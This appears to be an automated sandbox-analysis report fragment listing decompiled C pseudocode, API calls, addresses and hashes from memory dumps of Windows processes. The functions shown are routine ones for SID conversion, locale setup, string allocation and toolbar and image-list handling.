                                                                                                • Opcode ID: f70cf08df54b334fffc7769a306d9eac3b181b883dddd1a6f6d39f32b5580fb0
                                                                                                • Instruction ID: f7660d7204dd46fa6e47cb080f26490e8762917993264601f4d9fd8847fd600a
                                                                                                • Opcode Fuzzy Hash: f70cf08df54b334fffc7769a306d9eac3b181b883dddd1a6f6d39f32b5580fb0
                                                                                                • Instruction Fuzzy Hash: 05517FE1E0510596CB117F14CD4137A37A4FBC37A0F248D69F092822E9EB7D9C94BA5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 68%
                                                                                                			E00F75D70(intOrPtr __ecx, void* __edx) {
                                                                                                				void* _v8;
                                                                                                				char _v16;
                                                                                                				void* _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				void* _v28;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t18;
                                                                                                				void* _t24;
                                                                                                				intOrPtr _t27;
                                                                                                				void* _t29;
                                                                                                				intOrPtr* _t34;
                                                                                                				intOrPtr* _t39;
                                                                                                				void* _t40;
                                                                                                				void* _t42;
                                                                                                				void* _t43;
                                                                                                				intOrPtr _t44;
                                                                                                				signed int _t46;
                                                                                                
                                                                                                				_t18 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_t44 = __ecx;
                                                                                                				_v24 = __ecx;
                                                                                                				_v20 = 0;
                                                                                                				_v28 = 0;
                                                                                                				_v8 = 2;
                                                                                                				__imp__ConvertSidToStringSidW(__edx,  &_v28, _t18 ^ _t46, _t40, _t43,  *[fs:0x0], 0xfb5dd9, 0xffffffff);
                                                                                                				_t39 = _v28;
                                                                                                				 *(__ecx + 0x10) = 0;
                                                                                                				 *((intOrPtr*)(__ecx + 0x14)) = 7;
                                                                                                				 *((short*)(__ecx)) = 0;
                                                                                                				if(_t39 == 0) {
                                                                                                					E00F71D10(_t29, __ecx, _t40, __ecx, L"Invalid SID", 0xb);
                                                                                                					_v20 = 1;
                                                                                                				} else {
                                                                                                					_t34 = _t39;
                                                                                                					_t10 = _t34 + 2; // 0x2
                                                                                                					_t42 = _t10;
                                                                                                					do {
                                                                                                						_t27 =  *_t34;
                                                                                                						_t34 = _t34 + 2;
                                                                                                					} while (_t27 != 0);
                                                                                                					E00F71D10(_t29, __ecx, _t42, __ecx, _t39, _t34 - _t42 >> 1);
                                                                                                					_v20 = 1;
                                                                                                				}
                                                                                                				_v8 = 0;
                                                                                                				_t24 = _v28;
                                                                                                				if(_t24 != 0) {
                                                                                                					LocalFree(_t24);
                                                                                                					_v28 = 0;
                                                                                                				}
                                                                                                				 *[fs:0x0] = _v16;
                                                                                                				return _t44;
                                                                                                			}





















                                                                                                0x00f75d86
                                                                                                0x00f75d91
                                                                                                0x00f75d97
                                                                                                0x00f75d99
                                                                                                0x00f75d9c
                                                                                                0x00f75da3
                                                                                                0x00f75daa
                                                                                                0x00f75db6
                                                                                                0x00f75dbc
                                                                                                0x00f75dc1
                                                                                                0x00f75dc8
                                                                                                0x00f75dcf
                                                                                                0x00f75dd4
                                                                                                0x00f75e0a
                                                                                                0x00f75e0f
                                                                                                0x00f75dd6
                                                                                                0x00f75dd6
                                                                                                0x00f75dd8
                                                                                                0x00f75dd8
                                                                                                0x00f75de0
                                                                                                0x00f75de0
                                                                                                0x00f75de3
                                                                                                0x00f75de6
                                                                                                0x00f75df3
                                                                                                0x00f75df8
                                                                                                0x00f75df8
                                                                                                0x00f75e16
                                                                                                0x00f75e1d
                                                                                                0x00f75e22
                                                                                                0x00f75e25
                                                                                                0x00f75e2b
                                                                                                0x00f75e2b
                                                                                                0x00f75e37
                                                                                                0x00f75e44

                                                                                                APIs
                                                                                                • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00F75DB6
                                                                                                • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,FD8FA683), ref: 00F75E25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ConvertFreeLocalString
                                                                                                • String ID: Invalid SID
                                                                                                • API String ID: 3201929900-130637731
                                                                                                • Opcode ID: 7db2b4c51175c5a3a23fb8c55c7f1fd705e652e80f7196d8f241f4c31d771af2
                                                                                                • Instruction ID: 3e091bbc925bd108d7289a64c07863850d68abfe385f9f57b6802b610e68cd67
                                                                                                • Opcode Fuzzy Hash: 7db2b4c51175c5a3a23fb8c55c7f1fd705e652e80f7196d8f241f4c31d771af2
                                                                                                • Instruction Fuzzy Hash: B421C375A04609DBDB10DF58D805BAFBBF8FF44B54F10861EE80597280D7BAAA04DBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 74%
                                                                                                			E00F78E20(intOrPtr __ecx, void* __esi, intOrPtr _a4) {
                                                                                                				char _v8;
                                                                                                				char _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				signed int _t28;
                                                                                                				intOrPtr _t35;
                                                                                                				intOrPtr _t42;
                                                                                                				intOrPtr _t46;
                                                                                                				signed int _t51;
                                                                                                
                                                                                                				_t41 = __ecx;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb63fa);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_push(__ecx);
                                                                                                				_t28 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t28 ^ _t51);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_t46 = __ecx;
                                                                                                				_v20 = __ecx;
                                                                                                				E00F856E6(__ecx, 0);
                                                                                                				_v8 = 0;
                                                                                                				 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                                                				 *((char*)(__ecx + 8)) = 0;
                                                                                                				_v8 = 1;
                                                                                                				 *((intOrPtr*)(__ecx + 0xc)) = 0;
                                                                                                				 *((char*)(__ecx + 0x10)) = 0;
                                                                                                				_v8 = 2;
                                                                                                				 *((intOrPtr*)(__ecx + 0x14)) = 0;
                                                                                                				 *((short*)(__ecx + 0x18)) = 0;
                                                                                                				_v8 = 3;
                                                                                                				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
                                                                                                				 *((short*)(__ecx + 0x20)) = 0;
                                                                                                				_v8 = 4;
                                                                                                				 *((intOrPtr*)(__ecx + 0x24)) = 0;
                                                                                                				 *((char*)(__ecx + 0x28)) = 0;
                                                                                                				_v8 = 5;
                                                                                                				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
                                                                                                				 *((char*)(__ecx + 0x30)) = 0;
                                                                                                				_v8 = 6;
                                                                                                				_t33 = _a4;
                                                                                                				if(_a4 == 0) {
                                                                                                					E00F81E02("bad locale name");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					_t35 =  *((intOrPtr*)(_t41 + 4));
                                                                                                					if(_t35 == 0) {
                                                                                                						return 0xfc76d9;
                                                                                                					} else {
                                                                                                						_t42 =  *((intOrPtr*)(_t35 + 0x18));
                                                                                                						if(_t42 == 0) {
                                                                                                							return _t35 + 0x1c;
                                                                                                						} else {
                                                                                                							return _t42;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					E00F855A4(__ecx, __ecx, _t33);
                                                                                                					_v8 = 0xffffffff;
                                                                                                					 *[fs:0x0] = _v16;
                                                                                                					return _t46;
                                                                                                				}
                                                                                                			}











                                                                                                0x00f78e20
                                                                                                0x00f78e23
                                                                                                0x00f78e25
                                                                                                0x00f78e30
                                                                                                0x00f78e31
                                                                                                0x00f78e33
                                                                                                0x00f78e3a
                                                                                                0x00f78e3e
                                                                                                0x00f78e44
                                                                                                0x00f78e46
                                                                                                0x00f78e4b
                                                                                                0x00f78e50
                                                                                                0x00f78e57
                                                                                                0x00f78e5e
                                                                                                0x00f78e62
                                                                                                0x00f78e66
                                                                                                0x00f78e6d
                                                                                                0x00f78e71
                                                                                                0x00f78e77
                                                                                                0x00f78e7e
                                                                                                0x00f78e82
                                                                                                0x00f78e86
                                                                                                0x00f78e89
                                                                                                0x00f78e8d
                                                                                                0x00f78e91
                                                                                                0x00f78e94
                                                                                                0x00f78e97
                                                                                                0x00f78e9b
                                                                                                0x00f78e9e
                                                                                                0x00f78ea1
                                                                                                0x00f78ea5
                                                                                                0x00f78eaa
                                                                                                0x00f78ed6
                                                                                                0x00f78edb
                                                                                                0x00f78edc
                                                                                                0x00f78edd
                                                                                                0x00f78ede
                                                                                                0x00f78edf
                                                                                                0x00f78ee0
                                                                                                0x00f78ee5
                                                                                                0x00f78efa
                                                                                                0x00f78ee7
                                                                                                0x00f78ee7
                                                                                                0x00f78eec
                                                                                                0x00f78ef4
                                                                                                0x00f78eee
                                                                                                0x00f78ef0
                                                                                                0x00f78ef0
                                                                                                0x00f78eec
                                                                                                0x00f78eac
                                                                                                0x00f78eae
                                                                                                0x00f78eb6
                                                                                                0x00f78ec2
                                                                                                0x00f78ece
                                                                                                0x00f78ece

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F78E4B
                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F78EAE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 3988782225-1405518554
                                                                                                • Opcode ID: 5a70b0956b186449c268fdcfb722dd9e49c84d9a463495f1879c819b4a192779
                                                                                                • Instruction ID: 18a62c5c0bb21b630df7c6c1cc0bec4143d92ad38e02970951a9db47a00e96a4
                                                                                                • Opcode Fuzzy Hash: 5a70b0956b186449c268fdcfb722dd9e49c84d9a463495f1879c819b4a192779
                                                                                                • Instruction Fuzzy Hash: B721DE70809B84DED721CFA8C90578BBFE4EF15714F14869ED48587781D3B9A608DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 75%
                                                                                                			E00F71D10(signed int __ebx, long __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
                                                                                                				long _v8;
                                                                                                				char _v28;
                                                                                                				void* __ebp;
                                                                                                				signed int _t26;
                                                                                                				signed int _t30;
                                                                                                				void* _t31;
                                                                                                				void* _t33;
                                                                                                				void* _t36;
                                                                                                				void* _t37;
                                                                                                				long _t39;
                                                                                                				void* _t40;
                                                                                                				void* _t48;
                                                                                                				long _t55;
                                                                                                				long _t57;
                                                                                                				void* _t61;
                                                                                                				void* _t62;
                                                                                                				void** _t64;
                                                                                                				signed int _t69;
                                                                                                				void* _t70;
                                                                                                				void* _t72;
                                                                                                				signed int _t75;
                                                                                                				signed int _t80;
                                                                                                
                                                                                                				_t67 = __esi;
                                                                                                				_t57 = __ecx;
                                                                                                				_t52 = __ebx;
                                                                                                				_t26 = _a8;
                                                                                                				_push(__ebx);
                                                                                                				_push(__esi);
                                                                                                				_t64 = __ecx;
                                                                                                				_t75 =  *(__ecx + 0x14);
                                                                                                				if(_t26 > _t75) {
                                                                                                					__eflags = _t26 - 0x7ffffffe;
                                                                                                					if(_t26 > 0x7ffffffe) {
                                                                                                						L26:
                                                                                                						E00F71D00(_t52, _t57, _t64, _t67);
                                                                                                						goto L27;
                                                                                                					} else {
                                                                                                						_t69 = _t26 | 0x00000007;
                                                                                                						__eflags = _t69 - 0x7ffffffe;
                                                                                                						if(_t69 <= 0x7ffffffe) {
                                                                                                							_t57 = _t75 >> 1;
                                                                                                							__eflags = _t75 - 0x7ffffffe - _t57;
                                                                                                							if(_t75 <= 0x7ffffffe - _t57) {
                                                                                                								_t36 = _t57 + _t75;
                                                                                                								__eflags = _t69 - _t36;
                                                                                                								_t67 =  <  ? _t36 : _t69;
                                                                                                							} else {
                                                                                                								_t67 = 0x7ffffffe;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t67 = 0x7ffffffe;
                                                                                                						}
                                                                                                						_t8 = _t67 + 1; // 0x7fffffff
                                                                                                						_t37 = _t8;
                                                                                                						__eflags = _t37 - 0x7fffffff;
                                                                                                						if(__eflags > 0) {
                                                                                                							L25:
                                                                                                							E00F72A40(_t52, _t62, _t64, _t75, __eflags);
                                                                                                							goto L26;
                                                                                                						} else {
                                                                                                							_t39 = _t37 + _t37;
                                                                                                							__eflags = _t39 - 0x1000;
                                                                                                							if(_t39 < 0x1000) {
                                                                                                								__eflags = _t39;
                                                                                                								if(_t39 == 0) {
                                                                                                									_t52 = 0;
                                                                                                									__eflags = 0;
                                                                                                								} else {
                                                                                                									_t52 = LocalAlloc(0x40, _t39);
                                                                                                								}
                                                                                                								goto L18;
                                                                                                							} else {
                                                                                                								_t9 = _t39 + 0x23; // 0x80000022
                                                                                                								_t57 = _t9;
                                                                                                								__eflags = _t57 - _t39;
                                                                                                								if(__eflags <= 0) {
                                                                                                									goto L25;
                                                                                                								} else {
                                                                                                									_t48 = LocalAlloc(0x40, _t57);
                                                                                                									__eflags = _t48;
                                                                                                									if(__eflags == 0) {
                                                                                                										L27:
                                                                                                										E00F98D9C(_t52, _t57, _t62, _t64, __eflags);
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										_push(_t75);
                                                                                                										_push(0xffffffff);
                                                                                                										_push(0xfb53f0);
                                                                                                										_push( *[fs:0x0]);
                                                                                                										_t30 =  *0xfcf00c; // 0xfd8fa683
                                                                                                										_t31 = _t30 ^ _t80;
                                                                                                										__eflags = _t31;
                                                                                                										_push(_t31);
                                                                                                										 *[fs:0x0] =  &_v28;
                                                                                                										_t33 = HeapAlloc( *(_t57 + 4), 0, _v8);
                                                                                                										 *[fs:0x0] = _v28;
                                                                                                										return _t33;
                                                                                                									} else {
                                                                                                										_t10 = _t48 + 0x23; // 0x23
                                                                                                										_t52 = _t10 & 0xffffffe0;
                                                                                                										 *(_t52 - 4) = _t48;
                                                                                                										L18:
                                                                                                										_t40 = _a8;
                                                                                                										_t64[5] = _t67;
                                                                                                										_t64[4] = _t40;
                                                                                                										_t70 = _t40 + _t40;
                                                                                                										E00F96240(_t52, _a4, _t70);
                                                                                                										_t80 = _t80 + 0xc;
                                                                                                										 *((short*)(_t70 + _t52)) = 0;
                                                                                                										__eflags = _t75 - 8;
                                                                                                										if(_t75 < 8) {
                                                                                                											L24:
                                                                                                											 *_t64 = _t52;
                                                                                                											return _t64;
                                                                                                										} else {
                                                                                                											_t61 =  *_t64;
                                                                                                											__eflags = 2 + _t75 * 2 - 0x1000;
                                                                                                											if(2 + _t75 * 2 < 0x1000) {
                                                                                                												L22:
                                                                                                												__eflags = _t61;
                                                                                                												if(_t61 != 0) {
                                                                                                													LocalFree(_t61);
                                                                                                												}
                                                                                                												goto L24;
                                                                                                											} else {
                                                                                                												_t62 =  *(_t61 - 4);
                                                                                                												_t57 = _t61 - _t62;
                                                                                                												__eflags = _t57 - 4 - 0x1f;
                                                                                                												if(__eflags > 0) {
                                                                                                													goto L27;
                                                                                                												} else {
                                                                                                													_t61 = _t62;
                                                                                                													goto L22;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t55 = __ecx;
                                                                                                					if(_t75 >= 8) {
                                                                                                						_t55 =  *__ecx;
                                                                                                					}
                                                                                                					_t72 = _t26 + _t26;
                                                                                                					_t64[4] = _t26;
                                                                                                					E00F95C10(_t55, _a4, _t72);
                                                                                                					 *((short*)(_t72 + _t55)) = 0;
                                                                                                					return _t64;
                                                                                                				}
                                                                                                			}

























                                                                                                0x00f71d10
                                                                                                0x00f71d10
                                                                                                0x00f71d10
                                                                                                0x00f71d10
                                                                                                0x00f71d14
                                                                                                0x00f71d16
                                                                                                0x00f71d18
                                                                                                0x00f71d1a
                                                                                                0x00f71d1f
                                                                                                0x00f71d4d
                                                                                                0x00f71d52
                                                                                                0x00f71e3b
                                                                                                0x00f71e3b
                                                                                                0x00000000
                                                                                                0x00f71d58
                                                                                                0x00f71d5a
                                                                                                0x00f71d5d
                                                                                                0x00f71d63
                                                                                                0x00f71d73
                                                                                                0x00f71d77
                                                                                                0x00f71d79
                                                                                                0x00f71d82
                                                                                                0x00f71d85
                                                                                                0x00f71d87
                                                                                                0x00f71d7b
                                                                                                0x00f71d7b
                                                                                                0x00f71d7b
                                                                                                0x00f71d65
                                                                                                0x00f71d65
                                                                                                0x00f71d65
                                                                                                0x00f71d8a
                                                                                                0x00f71d8a
                                                                                                0x00f71d8d
                                                                                                0x00f71d92
                                                                                                0x00f71e36
                                                                                                0x00f71e36
                                                                                                0x00000000
                                                                                                0x00f71d98
                                                                                                0x00f71d98
                                                                                                0x00f71d9a
                                                                                                0x00f71d9f
                                                                                                0x00f71dc8
                                                                                                0x00f71dca
                                                                                                0x00f71dd9
                                                                                                0x00f71dd9
                                                                                                0x00f71dcc
                                                                                                0x00f71dd5
                                                                                                0x00f71dd5
                                                                                                0x00000000
                                                                                                0x00f71da1
                                                                                                0x00f71da1
                                                                                                0x00f71da1
                                                                                                0x00f71da4
                                                                                                0x00f71da6
                                                                                                0x00000000
                                                                                                0x00f71dac
                                                                                                0x00f71daf
                                                                                                0x00f71db5
                                                                                                0x00f71db7
                                                                                                0x00f71e40
                                                                                                0x00f71e40
                                                                                                0x00f71e45
                                                                                                0x00f71e46
                                                                                                0x00f71e47
                                                                                                0x00f71e48
                                                                                                0x00f71e49
                                                                                                0x00f71e4a
                                                                                                0x00f71e4b
                                                                                                0x00f71e4c
                                                                                                0x00f71e4d
                                                                                                0x00f71e4e
                                                                                                0x00f71e4f
                                                                                                0x00f71e50
                                                                                                0x00f71e53
                                                                                                0x00f71e55
                                                                                                0x00f71e60
                                                                                                0x00f71e61
                                                                                                0x00f71e66
                                                                                                0x00f71e66
                                                                                                0x00f71e68
                                                                                                0x00f71e6c
                                                                                                0x00f71e7a
                                                                                                0x00f71e83
                                                                                                0x00f71e8e
                                                                                                0x00f71dbd
                                                                                                0x00f71dbd
                                                                                                0x00f71dc0
                                                                                                0x00f71dc3
                                                                                                0x00f71ddb
                                                                                                0x00f71ddb
                                                                                                0x00f71ddf
                                                                                                0x00f71de2
                                                                                                0x00f71de5
                                                                                                0x00f71dee
                                                                                                0x00f71df5
                                                                                                0x00f71df8
                                                                                                0x00f71dfc
                                                                                                0x00f71dff
                                                                                                0x00f71e2b
                                                                                                0x00f71e2b
                                                                                                0x00f71e33
                                                                                                0x00f71e01
                                                                                                0x00f71e01
                                                                                                0x00f71e0a
                                                                                                0x00f71e0f
                                                                                                0x00f71e20
                                                                                                0x00f71e20
                                                                                                0x00f71e22
                                                                                                0x00f71e25
                                                                                                0x00f71e25
                                                                                                0x00000000
                                                                                                0x00f71e11
                                                                                                0x00f71e11
                                                                                                0x00f71e14
                                                                                                0x00f71e19
                                                                                                0x00f71e1c
                                                                                                0x00000000
                                                                                                0x00f71e1e
                                                                                                0x00f71e1e
                                                                                                0x00000000
                                                                                                0x00f71e1e
                                                                                                0x00f71e1c
                                                                                                0x00f71e0f
                                                                                                0x00f71dff
                                                                                                0x00f71db7
                                                                                                0x00f71da6
                                                                                                0x00f71d9f
                                                                                                0x00f71d92
                                                                                                0x00f71d21
                                                                                                0x00f71d21
                                                                                                0x00f71d26
                                                                                                0x00f71d28
                                                                                                0x00f71d28
                                                                                                0x00f71d2a
                                                                                                0x00f71d2d
                                                                                                0x00f71d36
                                                                                                0x00f71d40
                                                                                                0x00f71d4a
                                                                                                0x00f71d4a

                                                                                                APIs
                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,00000004,?,?,00F730E4,?,?), ref: 00F71DAF
                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,00000004,?,?,00F730E4,?,?), ref: 00F71DCF
                                                                                                • LocalFree.KERNEL32(?,?), ref: 00F71E25
                                                                                                • HeapAlloc.KERNEL32(?,00000000,?,FD8FA683,?,00FB53F0,000000FF), ref: 00F71E7A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AllocLocal$FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 2162915748-0
                                                                                                • Opcode ID: daaa312815b8ec341ba5a75bf78892fae97ff58292872a03aa2cbad75a745126
                                                                                                • Instruction ID: f36e51475c4168a57f7079bc2296435455441bcf54b36babf38925d82b7779fa
                                                                                                • Opcode Fuzzy Hash: daaa312815b8ec341ba5a75bf78892fae97ff58292872a03aa2cbad75a745126
                                                                                                • Instruction Fuzzy Hash: 06412D32600605AFC724AF28DC84A5AB7E9FB453E0F10873BF91AC7691DB319948DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Executed Functions

                                                                                                Non-executed Functions

                                                                                                APIs
                                                                                                • GdiFlush.GDI32 ref: 00457168
                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00457175
                                                                                                • GetLastError.KERNEL32(?,?,00000000,00000000,00000020), ref: 00457387
                                                                                                • GetObjectW.GDI32(?,00000018,?,?,?,00000000,00000000,00000020), ref: 004573D8
                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000020), ref: 004573E3
                                                                                                • GetLastError.KERNEL32(00000020,?,00000000,00000000,00000020), ref: 0045749B
                                                                                                • GetLastError.KERNEL32 ref: 00457180
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 00439430: GetCurrentProcess.KERNEL32(00000000,00000000,00502800,?,?,?,0043F3D3,?), ref: 00439460
                                                                                                  • Part of subcall function 00439430: TerminateProcess.KERNEL32(00000000,?,?,?,0043F3D3,?), ref: 00439467
                                                                                                  • Part of subcall function 00439430: InterlockedDecrement.KERNEL32(?), ref: 004394BA
                                                                                                  • Part of subcall function 00439430: GetCurrentProcess.KERNEL32(00000000), ref: 004394E5
                                                                                                  • Part of subcall function 00439430: TerminateProcess.KERNEL32(00000000), ref: 004394EC
                                                                                                  • Part of subcall function 0046C890: InterlockedDecrement.KERNEL32(?), ref: 0046CA18
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(00000000), ref: 0046CA51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLastProcess$Value$CriticalCurrentDecrementInterlockedObjectSectionTerminate$EnterException@8FlushLeaveThrow
                                                                                                • String ID: $ $::GetObject( bitmap, sizeof(bm), &bm ) == sizeof(bm)$::GetObject( info.hbmImage, sizeof(bmImageList), &bmImageList ) == sizeof(bmImageList)$@fO$@fO$@fO$@fO$@fO$@fO$@fO$@fO$@fO$AWL::AlphaImageListAdd$ImageList_GetImageInfo( imageList, firstNewImageIndex + i, &imageInfo )$ImageList_GetImageInfo( imageList, firstNewImageIndex, &info )$d:\build\teamagent\_work\1\s\0\awl\src\imagelistawl.cpp$xKS
                                                                                                • API String ID: 20631376-2796270341
                                                                                                • Opcode ID: 219904ba503d3f57437fb9df737a50ed3cb1578124dbe81a8a468d6d04ab9d5d
                                                                                                • Instruction ID: 9cfc196ab68c2f9c40c221cc23403270e9fcf0561d1b13a4702a1beeb087ad90
                                                                                                • Opcode Fuzzy Hash: 219904ba503d3f57437fb9df737a50ed3cb1578124dbe81a8a468d6d04ab9d5d
                                                                                                • Instruction Fuzzy Hash: 34D1E630E046095BDB249BA8DC82BBF7775AB48305F10413AED11A73C3EB789D09CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0045E245
                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000000), ref: 0045E277
                                                                                                • IsWindow.USER32(?), ref: 0045E28B
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045E2B5
                                                                                                • SetWindowLongW.USER32 ref: 0045E2C6
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0045E2DB
                                                                                                • IsWindow.USER32(?), ref: 0045E2E9
                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000000), ref: 0045E31B
                                                                                                • IsWindow.USER32(?), ref: 0045E331
                                                                                                • SendMessageW.USER32(?,00000418,00000000,00000000), ref: 0045E363
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0045E496
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$MessageSend$Long$DecrementInterlocked
                                                                                                • String ID: @fO$@fO$@fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h$d:\build\teamagent\_work\1\s\0\awl\src\toolbarawl.cpp$d:\build\teamagent\_work\1\s\0\awl\src\windowawl.cpp$xMS
                                                                                                • API String ID: 3106424415-1500989637
                                                                                                • Opcode ID: 279fd3e2b9ebc6b10691a4d321b3b6d20d9b27155eee2acf964cca8de3980012
                                                                                                • Instruction ID: 7e8106311cbe92ce864272c039955807f09cc2333c5d39fe98fa370cc04b9d79
                                                                                                • Opcode Fuzzy Hash: 279fd3e2b9ebc6b10691a4d321b3b6d20d9b27155eee2acf964cca8de3980012
                                                                                                • Instruction Fuzzy Hash: 5F71E670E40359ABEB149F658D02BBFBB78AF54701F10411AF910F72C2E7B8AA50C799
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00535528,74E070F0,00000000), ref: 004861CB
                                                                                                • LeaveCriticalSection.KERNEL32(00535528), ref: 0048649B
                                                                                                  • Part of subcall function 00489DD0: TlsGetValue.KERNEL32(0053011C,?,?,00487239), ref: 00489DF1
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 00486440
                                                                                                • InterlockedIncrement.KERNEL32(-00000004), ref: 004864CB
